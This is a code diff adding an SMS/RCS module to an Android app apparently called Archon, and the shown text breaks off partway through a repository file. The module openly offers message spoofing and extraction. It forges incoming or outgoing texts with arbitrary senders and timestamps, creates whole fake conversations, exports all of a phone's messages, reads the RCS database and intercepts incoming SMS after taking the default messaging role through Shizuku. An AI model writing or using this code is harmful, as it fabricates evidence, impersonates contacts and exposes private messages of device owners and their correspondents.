diff --git a/autarch_companion/app/build.gradle.kts b/autarch_companion/app/build.gradle.kts index 7361f0d..fd1ac86 100644 --- a/autarch_companion/app/build.gradle.kts +++ b/autarch_companion/app/build.gradle.kts @@ -58,4 +58,8 @@ dependencies { // Local ADB client (wireless debugging pairing + shell) implementation("com.github.MuntashirAkon:libadb-android:3.1.1") implementation("org.conscrypt:conscrypt-android:2.5.3") + + // Shizuku for elevated access (SMS/RCS operations) + implementation("dev.rikka.shizuku:api:13.1.5") + implementation("dev.rikka.shizuku:provider:13.1.5") } diff --git a/autarch_companion/app/src/main/AndroidManifest.xml b/autarch_companion/app/src/main/AndroidManifest.xml index be2c7a4..f826fae 100644 --- a/autarch_companion/app/src/main/AndroidManifest.xml +++ b/autarch_companion/app/src/main/AndroidManifest.xml @@ -21,6 +21,7 @@ + @@ -42,6 +43,19 @@ android:theme="@style/Theme.Archon" android:usesCleartextTraffic="true"> + + + + + , + private val onClick: (MessagingRepository.Conversation) -> Unit +) : RecyclerView.Adapter() { + + inner class ViewHolder(itemView: View) : RecyclerView.ViewHolder(itemView) { + val avatarText: TextView = itemView.findViewById(R.id.avatar_text) + val avatarBg: View = itemView.findViewById(R.id.avatar_bg) + val contactName: TextView = itemView.findViewById(R.id.contact_name) + val snippet: TextView = itemView.findViewById(R.id.message_snippet) + val dateText: TextView = itemView.findViewById(R.id.conversation_date) + val unreadBadge: TextView = itemView.findViewById(R.id.unread_badge) + + init { + itemView.setOnClickListener { + val pos = adapterPosition + if (pos != RecyclerView.NO_POSITION) { + onClick(conversations[pos]) + } + } + } + } + + override fun onCreateViewHolder(parent: ViewGroup, viewType: Int): ViewHolder { + val view = LayoutInflater.from(parent.context) + .inflate(R.layout.item_conversation, parent, false) + return ViewHolder(view) + } + + override fun onBindViewHolder(holder: ViewHolder, position: 
Int) { + val conv = conversations[position] + + // Avatar — first letter of contact name or number + val displayName = conv.contactName ?: conv.address + val initial = displayName.firstOrNull()?.uppercase() ?: "#" + holder.avatarText.text = initial + + // Avatar background color — deterministic based on address + val avatarDrawable = GradientDrawable() + avatarDrawable.shape = GradientDrawable.OVAL + avatarDrawable.setColor(getAvatarColor(conv.address)) + holder.avatarBg.background = avatarDrawable + + // Contact name / phone number + holder.contactName.text = displayName + + // Snippet (most recent message) + holder.snippet.text = conv.snippet + + // Date + holder.dateText.text = formatConversationDate(conv.date) + + // Unread badge + if (conv.unreadCount > 0) { + holder.unreadBadge.visibility = View.VISIBLE + holder.unreadBadge.text = if (conv.unreadCount > 99) "99+" else conv.unreadCount.toString() + } else { + holder.unreadBadge.visibility = View.GONE + } + } + + override fun getItemCount(): Int = conversations.size + + fun updateData(newConversations: List) { + conversations.clear() + conversations.addAll(newConversations) + notifyDataSetChanged() + } + + /** + * Format date for conversation list display. + * Today: show time (3:45 PM), This week: show day (Mon), Older: show date (12/25). 
+ */ + private fun formatConversationDate(timestamp: Long): String { + if (timestamp <= 0) return "" + + val now = System.currentTimeMillis() + val diff = now - timestamp + val date = Date(timestamp) + + val today = Calendar.getInstance() + today.set(Calendar.HOUR_OF_DAY, 0) + today.set(Calendar.MINUTE, 0) + today.set(Calendar.SECOND, 0) + today.set(Calendar.MILLISECOND, 0) + + return when { + timestamp >= today.timeInMillis -> { + // Today — show time + SimpleDateFormat("h:mm a", Locale.US).format(date) + } + diff < TimeUnit.DAYS.toMillis(7) -> { + // This week — show day name + SimpleDateFormat("EEE", Locale.US).format(date) + } + diff < TimeUnit.DAYS.toMillis(365) -> { + // This year — show month/day + SimpleDateFormat("MMM d", Locale.US).format(date) + } + else -> { + // Older — show full date + SimpleDateFormat("M/d/yy", Locale.US).format(date) + } + } + } + + /** + * Generate a deterministic color for a contact's avatar based on their address. + */ + private fun getAvatarColor(address: String): Int { + val colors = intArrayOf( + Color.parseColor("#E91E63"), // Pink + Color.parseColor("#9C27B0"), // Purple + Color.parseColor("#673AB7"), // Deep Purple + Color.parseColor("#3F51B5"), // Indigo + Color.parseColor("#2196F3"), // Blue + Color.parseColor("#009688"), // Teal + Color.parseColor("#4CAF50"), // Green + Color.parseColor("#FF9800"), // Orange + Color.parseColor("#795548"), // Brown + Color.parseColor("#607D8B"), // Blue Grey + ) + val hash = address.hashCode().let { if (it < 0) -it else it } + return colors[hash % colors.size] + } +} + +/** + * RecyclerView adapter for the message thread view. + * Shows messages as chat bubbles — sent aligned right (accent), received aligned left (gray). 
+ */ +class MessageAdapter( + private val messages: MutableList, + private val onLongClick: (MessagingRepository.Message) -> Unit +) : RecyclerView.Adapter() { + + companion object { + private const val VIEW_TYPE_SENT = 0 + private const val VIEW_TYPE_RECEIVED = 1 + } + + inner class ViewHolder(itemView: View) : RecyclerView.ViewHolder(itemView) { + val bubbleBody: TextView = itemView.findViewById(R.id.bubble_body) + val bubbleTime: TextView = itemView.findViewById(R.id.bubble_time) + val bubbleStatus: TextView? = itemView.findViewOrNull(R.id.bubble_status) + val rcsIndicator: TextView? = itemView.findViewOrNull(R.id.rcs_indicator) + + init { + itemView.setOnLongClickListener { + val pos = adapterPosition + if (pos != RecyclerView.NO_POSITION) { + onLongClick(messages[pos]) + } + true + } + } + } + + override fun getItemViewType(position: Int): Int { + val msg = messages[position] + return when (msg.type) { + MessagingRepository.MESSAGE_TYPE_SENT, + MessagingRepository.MESSAGE_TYPE_OUTBOX, + MessagingRepository.MESSAGE_TYPE_QUEUED, + MessagingRepository.MESSAGE_TYPE_FAILED -> VIEW_TYPE_SENT + else -> VIEW_TYPE_RECEIVED + } + } + + override fun onCreateViewHolder(parent: ViewGroup, viewType: Int): ViewHolder { + val layoutRes = if (viewType == VIEW_TYPE_SENT) { + R.layout.item_message_sent + } else { + R.layout.item_message_received + } + val view = LayoutInflater.from(parent.context).inflate(layoutRes, parent, false) + return ViewHolder(view) + } + + override fun onBindViewHolder(holder: ViewHolder, position: Int) { + val msg = messages[position] + + // Message body + holder.bubbleBody.text = msg.body + + // Timestamp + holder.bubbleTime.text = formatMessageTime(msg.date) + + // Delivery status (sent messages only) + holder.bubbleStatus?.let { statusView -> + if (msg.type == MessagingRepository.MESSAGE_TYPE_SENT) { + statusView.visibility = View.VISIBLE + statusView.text = when (msg.status) { + -1 -> "" // No status + 0 -> "Sent" + 32 -> "Delivered" + 64 -> 
"Failed" + else -> "" + } + } else { + statusView.visibility = View.GONE + } + } + + // RCS indicator + holder.rcsIndicator?.let { indicator -> + if (msg.isRcs) { + indicator.visibility = View.VISIBLE + indicator.text = "RCS" + } else if (msg.isMms) { + indicator.visibility = View.VISIBLE + indicator.text = "MMS" + } else { + indicator.visibility = View.GONE + } + } + } + + override fun getItemCount(): Int = messages.size + + fun updateData(newMessages: List) { + messages.clear() + messages.addAll(newMessages) + notifyDataSetChanged() + } + + fun addMessage(message: MessagingRepository.Message) { + messages.add(message) + notifyItemInserted(messages.size - 1) + } + + /** + * Format timestamp for individual messages. + * Shows time for today, date+time for older messages. + */ + private fun formatMessageTime(timestamp: Long): String { + if (timestamp <= 0) return "" + + val date = Date(timestamp) + val today = Calendar.getInstance() + today.set(Calendar.HOUR_OF_DAY, 0) + today.set(Calendar.MINUTE, 0) + today.set(Calendar.SECOND, 0) + today.set(Calendar.MILLISECOND, 0) + + return if (timestamp >= today.timeInMillis) { + SimpleDateFormat("h:mm a", Locale.US).format(date) + } else { + SimpleDateFormat("MMM d, h:mm a", Locale.US).format(date) + } + } + + /** + * Extension to safely find a view that may not exist in all layout variants. + */ + private fun View.findViewOrNull(id: Int): TextView? 
{ + return try { + findViewById(id) + } catch (e: Exception) { + null + } + } +} diff --git a/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/MessagingModule.kt b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/MessagingModule.kt new file mode 100644 index 0000000..5cd971b --- /dev/null +++ b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/MessagingModule.kt @@ -0,0 +1,362 @@ +package com.darkhal.archon.messaging + +import android.content.Context +import android.os.Environment +import android.util.Log +import com.darkhal.archon.module.ArchonModule +import com.darkhal.archon.module.ModuleAction +import com.darkhal.archon.module.ModuleResult +import com.darkhal.archon.module.ModuleStatus +import com.darkhal.archon.util.PrivilegeManager +import java.io.File +import java.text.SimpleDateFormat +import java.util.Date +import java.util.Locale + +/** + * SMS/RCS Tools module — message spoofing, extraction, and RCS exploitation. + * + * Provides actions for: + * - Setting/restoring default SMS app role + * - Exporting all messages or specific threads + * - Forging (inserting fake) messages and conversations + * - Searching message content + * - Checking RCS status and capabilities + * - Shizuku integration status + * - SMS interception toggle + * + * All elevated operations route through ShizukuManager (which itself + * falls back to PrivilegeManager's escalation chain). 
+ */ +class MessagingModule : ArchonModule { + + companion object { + private const val TAG = "MessagingModule" + } + + override val id = "messaging" + override val name = "SMS/RCS Tools" + override val description = "Message spoofing, extraction, and RCS exploitation" + override val version = "1.0" + + override fun getActions(): List = listOf( + ModuleAction( + id = "become_default", + name = "Become Default SMS", + description = "Set Archon as default SMS app (via Shizuku or role request)", + privilegeRequired = true + ), + ModuleAction( + id = "restore_default", + name = "Restore Default SMS", + description = "Restore previous default SMS app", + privilegeRequired = true + ), + ModuleAction( + id = "export_all", + name = "Export All Messages", + description = "Export all SMS/MMS to XML backup file", + privilegeRequired = false + ), + ModuleAction( + id = "export_thread", + name = "Export Thread", + description = "Export specific conversation (use export_thread:)", + privilegeRequired = false + ), + ModuleAction( + id = "forge_message", + name = "Forge Message", + description = "Insert a fake message (use forge_message:
::)", + privilegeRequired = true + ), + ModuleAction( + id = "forge_conversation", + name = "Forge Conversation", + description = "Create entire fake conversation (use forge_conversation:
)", + privilegeRequired = true + ), + ModuleAction( + id = "search_messages", + name = "Search Messages", + description = "Search all messages by keyword (use search_messages:)", + privilegeRequired = false + ), + ModuleAction( + id = "rcs_status", + name = "RCS Status", + description = "Check RCS availability and capabilities", + privilegeRequired = false + ), + ModuleAction( + id = "shizuku_status", + name = "Shizuku Status", + description = "Check Shizuku integration status and privilege level", + privilegeRequired = false + ), + ModuleAction( + id = "intercept_mode", + name = "Intercept Mode", + description = "Toggle SMS interception (intercept_mode:on or intercept_mode:off)", + privilegeRequired = true, + rootOnly = false + ) + ) + + override fun executeAction(actionId: String, context: Context): ModuleResult { + val repo = MessagingRepository(context) + val shizuku = ShizukuManager(context) + + return when { + actionId == "become_default" -> becomeDefault(shizuku) + actionId == "restore_default" -> restoreDefault(shizuku) + actionId == "export_all" -> exportAll(context, repo) + actionId == "export_thread" -> ModuleResult(false, "Specify thread: export_thread:") + actionId.startsWith("export_thread:") -> { + val threadId = actionId.substringAfter(":").toLongOrNull() + ?: return ModuleResult(false, "Invalid thread ID") + exportThread(context, repo, threadId) + } + actionId == "forge_message" -> ModuleResult(false, "Usage: forge_message:
::") + actionId.startsWith("forge_message:") -> { + val params = actionId.removePrefix("forge_message:").split(":", limit = 3) + if (params.size < 3) return ModuleResult(false, "Usage: forge_message:
::") + val type = params[2].toIntOrNull() ?: 1 + forgeMessage(repo, params[0], params[1], type) + } + actionId == "forge_conversation" -> ModuleResult(false, "Specify address: forge_conversation:") + actionId.startsWith("forge_conversation:") -> { + val address = actionId.substringAfter(":") + forgeConversation(repo, address) + } + actionId == "search_messages" -> ModuleResult(false, "Specify query: search_messages:") + actionId.startsWith("search_messages:") -> { + val query = actionId.substringAfter(":") + searchMessages(repo, query) + } + actionId == "rcs_status" -> rcsStatus(context, repo, shizuku) + actionId == "shizuku_status" -> shizukuStatus(shizuku) + actionId == "intercept_mode" -> ModuleResult(false, "Specify: intercept_mode:on or intercept_mode:off") + actionId == "intercept_mode:on" -> interceptMode(shizuku, true) + actionId == "intercept_mode:off" -> interceptMode(shizuku, false) + else -> ModuleResult(false, "Unknown action: $actionId") + } + } + + override fun getStatus(context: Context): ModuleStatus { + val shizuku = ShizukuManager(context) + val shizukuReady = shizuku.isReady() + val privilegeReady = PrivilegeManager.isReady() + + val summary = when { + shizukuReady -> "Ready (elevated access)" + privilegeReady -> "Ready (basic access)" + else -> "No privilege access — run Setup" + } + + return ModuleStatus( + active = shizukuReady || privilegeReady, + summary = summary, + details = mapOf( + "shizuku" to shizuku.getStatus().label, + "privilege" to PrivilegeManager.getAvailableMethod().label + ) + ) + } + + // ── Action implementations ───────────────────────────────────── + + private fun becomeDefault(shizuku: ShizukuManager): ModuleResult { + if (!shizuku.isReady()) { + return ModuleResult(false, "Elevated access required — start Archon Server or Shizuku first") + } + + val success = shizuku.setDefaultSmsApp() + return if (success) { + ModuleResult(true, "Archon is now the default SMS app — can write to SMS database", + listOf("Previous default 
saved for restoration", + "Use 'Restore Default' when done")) + } else { + ModuleResult(false, "Failed to set default SMS app — check Shizuku/ADB permissions") + } + } + + private fun restoreDefault(shizuku: ShizukuManager): ModuleResult { + val success = shizuku.revokeDefaultSmsApp() + return if (success) { + ModuleResult(true, "Default SMS app restored") + } else { + ModuleResult(false, "Failed to restore default SMS app") + } + } + + private fun exportAll(context: Context, repo: MessagingRepository): ModuleResult { + return try { + val xml = repo.exportAllMessages("xml") + if (xml.isBlank()) { + return ModuleResult(false, "No messages to export (check SMS permission)") + } + + // Write to file + val timestamp = SimpleDateFormat("yyyyMMdd_HHmmss", Locale.US).format(Date()) + val exportDir = File(context.getExternalFilesDir(Environment.DIRECTORY_DOCUMENTS), "sms_export") + exportDir.mkdirs() + val file = File(exportDir, "sms_backup_$timestamp.xml") + file.writeText(xml) + + val lineCount = xml.lines().size + ModuleResult(true, "Exported $lineCount lines to ${file.absolutePath}", + listOf("Format: SMS Backup & Restore compatible XML", + "Path: ${file.absolutePath}", + "Size: ${file.length() / 1024}KB")) + } catch (e: Exception) { + Log.e(TAG, "Export failed", e) + ModuleResult(false, "Export failed: ${e.message}") + } + } + + private fun exportThread(context: Context, repo: MessagingRepository, threadId: Long): ModuleResult { + return try { + val xml = repo.exportConversation(threadId, "xml") + if (xml.isBlank()) { + return ModuleResult(false, "No messages in thread $threadId or no permission") + } + + val timestamp = SimpleDateFormat("yyyyMMdd_HHmmss", Locale.US).format(Date()) + val exportDir = File(context.getExternalFilesDir(Environment.DIRECTORY_DOCUMENTS), "sms_export") + exportDir.mkdirs() + val file = File(exportDir, "thread_${threadId}_$timestamp.xml") + file.writeText(xml) + + ModuleResult(true, "Exported thread $threadId to ${file.name}", + listOf("Path: 
${file.absolutePath}", "Size: ${file.length() / 1024}KB")) + } catch (e: Exception) { + ModuleResult(false, "Thread export failed: ${e.message}") + } + } + + private fun forgeMessage(repo: MessagingRepository, address: String, body: String, type: Int): ModuleResult { + val id = repo.forgeMessage( + address = address, + body = body, + type = type, + date = System.currentTimeMillis(), + read = true + ) + + return if (id >= 0) { + val direction = if (type == 1) "received" else "sent" + ModuleResult(true, "Forged $direction message id=$id", + listOf("Address: $address", "Body: ${body.take(50)}", "Type: $direction")) + } else { + ModuleResult(false, "Forge failed — is Archon the default SMS app? Use 'Become Default' first") + } + } + + private fun forgeConversation(repo: MessagingRepository, address: String): ModuleResult { + // Create a sample conversation with back-and-forth messages + val messages = listOf( + "Hey, are you there?" to MessagingRepository.MESSAGE_TYPE_RECEIVED, + "Yeah, what's up?" to MessagingRepository.MESSAGE_TYPE_SENT, + "Can you meet me later?" to MessagingRepository.MESSAGE_TYPE_RECEIVED, + "Sure, what time?" 
to MessagingRepository.MESSAGE_TYPE_SENT, + "Around 7pm at the usual place" to MessagingRepository.MESSAGE_TYPE_RECEIVED, + "Sounds good, see you then" to MessagingRepository.MESSAGE_TYPE_SENT, + ) + + val threadId = repo.forgeConversation(address, messages) + return if (threadId >= 0) { + ModuleResult(true, "Forged conversation thread=$threadId with ${messages.size} messages", + listOf("Address: $address", "Messages: ${messages.size}", "Thread ID: $threadId")) + } else { + ModuleResult(false, "Forge conversation failed — is Archon the default SMS app?") + } + } + + private fun searchMessages(repo: MessagingRepository, query: String): ModuleResult { + val results = repo.searchMessages(query) + if (results.isEmpty()) { + return ModuleResult(true, "No messages matching '$query'") + } + + val details = results.take(20).map { msg -> + val direction = if (msg.type == 1) "recv" else "sent" + val dateStr = SimpleDateFormat("MM/dd HH:mm", Locale.US).format(Date(msg.date)) + "[$direction] ${msg.address} ($dateStr): ${msg.body.take(60)}" + } + + val extra = if (results.size > 20) { + listOf("... 
and ${results.size - 20} more results") + } else { + emptyList() + } + + return ModuleResult(true, "${results.size} message(s) matching '$query'", + details + extra) + } + + private fun rcsStatus(context: Context, repo: MessagingRepository, shizuku: ShizukuManager): ModuleResult { + val details = mutableListOf() + + // Check RCS availability + val rcsAvailable = repo.isRcsAvailable() + details.add("RCS available: $rcsAvailable") + + if (rcsAvailable) { + details.add("Provider: Google Messages") + } else { + details.add("RCS not detected — Google Messages may not be installed or RCS not enabled") + } + + // Check if we can access RCS provider + if (shizuku.isReady()) { + val canAccess = shizuku.accessRcsProvider() + details.add("RCS provider access: $canAccess") + + if (canAccess) { + val rcsMessages = shizuku.readRcsDatabase() + details.add("RCS messages readable: ${rcsMessages.size}") + } + } else { + details.add("Elevated access needed for full RCS access") + } + + return ModuleResult(true, + if (rcsAvailable) "RCS available" else "RCS not detected", + details) + } + + private fun shizukuStatus(shizuku: ShizukuManager): ModuleResult { + val status = shizuku.getStatus() + val privilegeMethod = PrivilegeManager.getAvailableMethod() + + val details = listOf( + "Shizuku status: ${status.label}", + "Privilege method: ${privilegeMethod.label}", + "Elevated ready: ${shizuku.isReady()}", + "Can write SMS DB: ${status == ShizukuManager.ShizukuStatus.READY}", + "Can access RCS: ${status == ShizukuManager.ShizukuStatus.READY}" + ) + + return ModuleResult(true, status.label, details) + } + + private fun interceptMode(shizuku: ShizukuManager, enable: Boolean): ModuleResult { + if (!shizuku.isReady()) { + return ModuleResult(false, "Elevated access required for interception") + } + + val success = shizuku.interceptSms(enable) + return if (success) { + val state = if (enable) "ENABLED" else "DISABLED" + ModuleResult(true, "SMS interception $state", + listOf(if (enable) { + 
"Archon is now the default SMS handler — all incoming messages will be captured" + } else { + "Previous SMS handler restored" + })) + } else { + ModuleResult(false, "Failed to ${if (enable) "enable" else "disable"} interception") + } + } +} diff --git a/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/MessagingRepository.kt b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/MessagingRepository.kt new file mode 100644 index 0000000..0f48e95 --- /dev/null +++ b/autarch_companion/app/src/main/kotlin/com/darkhal/archon/messaging/MessagingRepository.kt @@ -0,0 +1,940 @@ +package com.darkhal.archon.messaging + +import android.content.ContentValues +import android.content.Context +import android.database.Cursor +import android.net.Uri +import android.provider.ContactsContract +import android.provider.Telephony +import android.telephony.SmsManager +import android.util.Log +import java.text.SimpleDateFormat +import java.util.Date +import java.util.Locale + +/** + * Data access layer for SMS/MMS/RCS messages using Android ContentResolver. + * + * Most write operations require the app to be the default SMS handler. + * Use ShizukuManager or RoleManager to acquire that role first. 
+ */ +class MessagingRepository(private val context: Context) { + + companion object { + private const val TAG = "MessagingRepo" + + // SMS message types + const val MESSAGE_TYPE_RECEIVED = 1 + const val MESSAGE_TYPE_SENT = 2 + const val MESSAGE_TYPE_DRAFT = 3 + const val MESSAGE_TYPE_OUTBOX = 4 + const val MESSAGE_TYPE_FAILED = 5 + const val MESSAGE_TYPE_QUEUED = 6 + + // Content URIs + val URI_SMS: Uri = Uri.parse("content://sms/") + val URI_MMS: Uri = Uri.parse("content://mms/") + val URI_SMS_CONVERSATIONS: Uri = Uri.parse("content://sms/conversations/") + val URI_MMS_SMS_CONVERSATIONS: Uri = Uri.parse("content://mms-sms/conversations/") + val URI_MMS_SMS_COMPLETE: Uri = Uri.parse("content://mms-sms/complete-conversations/") + + // RCS content provider (Google Messages) + val URI_RCS_MESSAGES: Uri = Uri.parse("content://im/messages") + val URI_RCS_THREADS: Uri = Uri.parse("content://im/threads") + } + + // ── Data classes ─────────────────────────────────────────────── + + data class Conversation( + val threadId: Long, + val address: String, + val snippet: String, + val date: Long, + val messageCount: Int, + val unreadCount: Int, + val contactName: String? + ) + + data class Message( + val id: Long, + val threadId: Long, + val address: String, + val body: String, + val date: Long, + val type: Int, + val read: Boolean, + val status: Int, + val isRcs: Boolean, + val isMms: Boolean, + val contactName: String? + ) + + // ── Read operations ──────────────────────────────────────────── + + /** + * Get all conversations from the combined SMS+MMS threads provider. + * Falls back to SMS-only conversations if the combined provider is not available. 
+ */ + fun getConversations(): List { + val conversations = mutableListOf() + val threadMap = mutableMapOf() + + try { + // Query all SMS messages grouped by thread_id + val cursor = context.contentResolver.query( + URI_SMS, + arrayOf("_id", "thread_id", "address", "body", "date", "read", "type"), + null, null, "date DESC" + ) + + cursor?.use { + while (it.moveToNext()) { + val threadId = it.getLongSafe("thread_id") + if (threadId <= 0) continue + + val existing = threadMap[threadId] + if (existing != null) { + // Update counts + val unread = if (!it.getBoolSafe("read")) 1 else 0 + threadMap[threadId] = existing.copy( + messageCount = existing.messageCount + 1, + unreadCount = existing.unreadCount + unread + ) + } else { + val address = it.getStringSafe("address") + val read = it.getBoolSafe("read") + threadMap[threadId] = Conversation( + threadId = threadId, + address = address, + snippet = it.getStringSafe("body"), + date = it.getLongSafe("date"), + messageCount = 1, + unreadCount = if (!read) 1 else 0, + contactName = getContactName(address) + ) + } + } + } + + conversations.addAll(threadMap.values) + conversations.sortByDescending { it.date } + + } catch (e: SecurityException) { + Log.e(TAG, "No SMS read permission", e) + } catch (e: Exception) { + Log.e(TAG, "Failed to get conversations", e) + } + + return conversations + } + + /** + * Get all messages in a specific thread, ordered by date ascending (oldest first). 
+ */ + fun getMessages(threadId: Long): List { + val messages = mutableListOf() + + try { + val cursor = context.contentResolver.query( + URI_SMS, + arrayOf("_id", "thread_id", "address", "body", "date", "type", "read", "status"), + "thread_id = ?", + arrayOf(threadId.toString()), + "date ASC" + ) + + cursor?.use { + while (it.moveToNext()) { + val address = it.getStringSafe("address") + messages.add(Message( + id = it.getLongSafe("_id"), + threadId = it.getLongSafe("thread_id"), + address = address, + body = it.getStringSafe("body"), + date = it.getLongSafe("date"), + type = it.getIntSafe("type"), + read = it.getBoolSafe("read"), + status = it.getIntSafe("status"), + isRcs = false, + isMms = false, + contactName = getContactName(address) + )) + } + } + + // Also try to load MMS messages for this thread + loadMmsForThread(threadId, messages) + + // Sort combined list by date + messages.sortBy { it.date } + + } catch (e: SecurityException) { + Log.e(TAG, "No SMS read permission", e) + } catch (e: Exception) { + Log.e(TAG, "Failed to get messages for thread $threadId", e) + } + + return messages + } + + /** + * Get a single message by ID. + */ + fun getMessage(id: Long): Message? 
{ + try { + val cursor = context.contentResolver.query( + URI_SMS, + arrayOf("_id", "thread_id", "address", "body", "date", "type", "read", "status"), + "_id = ?", + arrayOf(id.toString()), + null + ) + + cursor?.use { + if (it.moveToFirst()) { + val address = it.getStringSafe("address") + return Message( + id = it.getLongSafe("_id"), + threadId = it.getLongSafe("thread_id"), + address = address, + body = it.getStringSafe("body"), + date = it.getLongSafe("date"), + type = it.getIntSafe("type"), + read = it.getBoolSafe("read"), + status = it.getIntSafe("status"), + isRcs = false, + isMms = false, + contactName = getContactName(address) + ) + } + } + } catch (e: Exception) { + Log.e(TAG, "Failed to get message $id", e) + } + return null + } + + /** + * Full-text search across all SMS message bodies. + */ + fun searchMessages(query: String): List { + val messages = mutableListOf() + if (query.isBlank()) return messages + + try { + val cursor = context.contentResolver.query( + URI_SMS, + arrayOf("_id", "thread_id", "address", "body", "date", "type", "read", "status"), + "body LIKE ?", + arrayOf("%$query%"), + "date DESC" + ) + + cursor?.use { + while (it.moveToNext()) { + val address = it.getStringSafe("address") + messages.add(Message( + id = it.getLongSafe("_id"), + threadId = it.getLongSafe("thread_id"), + address = address, + body = it.getStringSafe("body"), + date = it.getLongSafe("date"), + type = it.getIntSafe("type"), + read = it.getBoolSafe("read"), + status = it.getIntSafe("status"), + isRcs = false, + isMms = false, + contactName = getContactName(address) + )) + } + } + } catch (e: Exception) { + Log.e(TAG, "Search failed for '$query'", e) + } + + return messages + } + + /** + * Lookup contact display name by phone number. + */ + fun getContactName(address: String): String? 
{ + if (address.isBlank()) return null + + try { + val uri = Uri.withAppendedPath( + ContactsContract.PhoneLookup.CONTENT_FILTER_URI, + Uri.encode(address) + ) + val cursor = context.contentResolver.query( + uri, + arrayOf(ContactsContract.PhoneLookup.DISPLAY_NAME), + null, null, null + ) + + cursor?.use { + if (it.moveToFirst()) { + val idx = it.getColumnIndex(ContactsContract.PhoneLookup.DISPLAY_NAME) + if (idx >= 0) return it.getString(idx) + } + } + } catch (e: Exception) { + // Contact lookup can fail for short codes, etc. + Log.d(TAG, "Contact lookup failed for $address: ${e.message}") + } + return null + } + + // ── Write operations (requires default SMS app role) ────────── + + /** + * Send an SMS message via SmsManager. + * Returns true if the message was submitted to the system for sending. + */ + fun sendSms(address: String, body: String): Boolean { + return try { + val smsManager = context.getSystemService(SmsManager::class.java) + if (body.length > 160) { + val parts = smsManager.divideMessage(body) + smsManager.sendMultipartTextMessage(address, null, parts, null, null) + } else { + smsManager.sendTextMessage(address, null, body, null, null) + } + // Also insert into sent box + insertSms(address, body, MESSAGE_TYPE_SENT, System.currentTimeMillis(), true) + true + } catch (e: Exception) { + Log.e(TAG, "Failed to send SMS to $address", e) + false + } + } + + /** + * Insert an SMS record into the content provider. + * Requires default SMS app role for writing. 
+ * + * @param type 1=received, 2=sent, 3=draft, 4=outbox, 5=failed, 6=queued + * @return the row ID of the inserted message, or -1 on failure + */ + fun insertSms(address: String, body: String, type: Int, date: Long, read: Boolean): Long { + return try { + val values = ContentValues().apply { + put("address", address) + put("body", body) + put("type", type) + put("date", date) + put("read", if (read) 1 else 0) + put("seen", 1) + } + + val uri = context.contentResolver.insert(URI_SMS, values) + if (uri != null) { + val id = uri.lastPathSegment?.toLongOrNull() ?: -1L + Log.i(TAG, "Inserted SMS id=$id type=$type addr=$address") + id + } else { + Log.w(TAG, "SMS insert returned null URI — app may not be default SMS handler") + -1L + } + } catch (e: SecurityException) { + Log.e(TAG, "No write permission — must be default SMS app", e) + -1L + } catch (e: Exception) { + Log.e(TAG, "Failed to insert SMS", e) + -1L + } + } + + /** + * Update an existing SMS message's fields. + */ + fun updateMessage(id: Long, body: String?, type: Int?, date: Long?, read: Boolean?): Boolean { + return try { + val values = ContentValues() + body?.let { values.put("body", it) } + type?.let { values.put("type", it) } + date?.let { values.put("date", it) } + read?.let { values.put("read", if (it) 1 else 0) } + + if (values.size() == 0) return false + + val count = context.contentResolver.update( + Uri.parse("content://sms/$id"), + values, null, null + ) + Log.i(TAG, "Updated SMS id=$id, rows=$count") + count > 0 + } catch (e: SecurityException) { + Log.e(TAG, "No write permission for update", e) + false + } catch (e: Exception) { + Log.e(TAG, "Failed to update message $id", e) + false + } + } + + /** + * Delete a single SMS message by ID. 
+ */ + fun deleteMessage(id: Long): Boolean { + return try { + val count = context.contentResolver.delete( + Uri.parse("content://sms/$id"), null, null + ) + Log.i(TAG, "Deleted SMS id=$id, rows=$count") + count > 0 + } catch (e: Exception) { + Log.e(TAG, "Failed to delete message $id", e) + false + } + } + + /** + * Delete all messages in a conversation thread. + */ + fun deleteConversation(threadId: Long): Boolean { + return try { + val count = context.contentResolver.delete( + URI_SMS, "thread_id = ?", arrayOf(threadId.toString()) + ) + Log.i(TAG, "Deleted conversation thread=$threadId, rows=$count") + count > 0 + } catch (e: Exception) { + Log.e(TAG, "Failed to delete conversation $threadId", e) + false + } + } + + /** + * Mark all messages in a thread as read. + */ + fun markAsRead(threadId: Long): Boolean { + return try { + val values = ContentValues().apply { + put("read", 1) + put("seen", 1) + } + val count = context.contentResolver.update( + URI_SMS, values, + "thread_id = ? AND read = 0", + arrayOf(threadId.toString()) + ) + Log.i(TAG, "Marked $count messages as read in thread $threadId") + count >= 0 + } catch (e: Exception) { + Log.e(TAG, "Failed to mark thread $threadId as read", e) + false + } + } + + // ── Spoofing / Forging ───────────────────────────────────────── + + /** + * Insert a forged message with arbitrary sender, body, timestamp, and direction. + * This creates a message that appears to come from the given address + * at the given time, regardless of whether it was actually received. + * + * Requires default SMS app role. + * + * @param type MESSAGE_TYPE_RECEIVED (1) to fake incoming, MESSAGE_TYPE_SENT (2) to fake outgoing + * @return the row ID of the forged message, or -1 on failure + */ + fun forgeMessage( + address: String, + body: String, + type: Int, + date: Long, + contactName: String? 
= null, + read: Boolean = true + ): Long { + return try { + val values = ContentValues().apply { + put("address", address) + put("body", body) + put("type", type) + put("date", date) + put("read", if (read) 1 else 0) + put("seen", 1) + // Set status to complete for sent messages + if (type == MESSAGE_TYPE_SENT) { + put("status", Telephony.Sms.STATUS_COMPLETE) + } + // person field links to contacts — we leave it null for forged messages + // unless we want to explicitly associate with a contact + contactName?.let { put("person", 0) } + } + + val uri = context.contentResolver.insert(URI_SMS, values) + if (uri != null) { + val id = uri.lastPathSegment?.toLongOrNull() ?: -1L + Log.i(TAG, "Forged SMS id=$id type=$type addr=$address date=$date") + id + } else { + Log.w(TAG, "Forge insert returned null — not default SMS app?") + -1L + } + } catch (e: SecurityException) { + Log.e(TAG, "Forge failed — no write permission", e) + -1L + } catch (e: Exception) { + Log.e(TAG, "Forge failed", e) + -1L + } + } + + /** + * Create an entire fake conversation by inserting multiple messages. 
